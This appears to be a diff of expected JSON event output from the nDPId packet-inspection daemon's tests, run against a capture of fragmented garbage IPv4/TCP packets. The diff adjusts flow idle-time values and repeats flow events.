00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4mKigqJl4lJCMmKihLSUo="}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697}
@@ -626,8 +626,8 @@
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkQyKiZERkdISksmXiUkIyM="}
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244024701}
00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkVUUiVZXlUm"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001}
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjxNTkJIR0ZERVcjQCQlXkg="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":316,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001}
@@ -1252,8 +1252,8 @@
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":625,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSg="}
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025005}
00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiomXiUkI0Aj"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305}
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnVoZ2tmZHNia252Yy8udGc="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":629,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305}
@@ -1878,8 +1878,8 @@
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":938,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAj9HUj9HUj9zUj83NDgzOTY="}
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025309}
00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAikoKiZeJSQj"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609}
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCMkJV4mKigqJl4lJCM="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":942,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609}
@@ -2504,8 +2504,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1251,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAktJSkhHRkQyKiZERkdISks="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025612}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjI0VU"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAmxrZGE+TDxNTkJIR0ZERVc="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1255,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912}
@@ -3130,8 +3130,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1564,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeSEJHVgo0MjE0NjMxOTg="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025916}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjIwNTEpKCom"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjcnNkbHVoZ2tmZHNia24="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1568,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217}
@@ -3756,8 +3756,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1877,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj8="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026221}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjc0ODM5Niko"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCMkJV4mKig="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1881,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521}
@@ -4382,8 +4382,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2190,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiY="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026525}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkRGR0hKSyZe"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
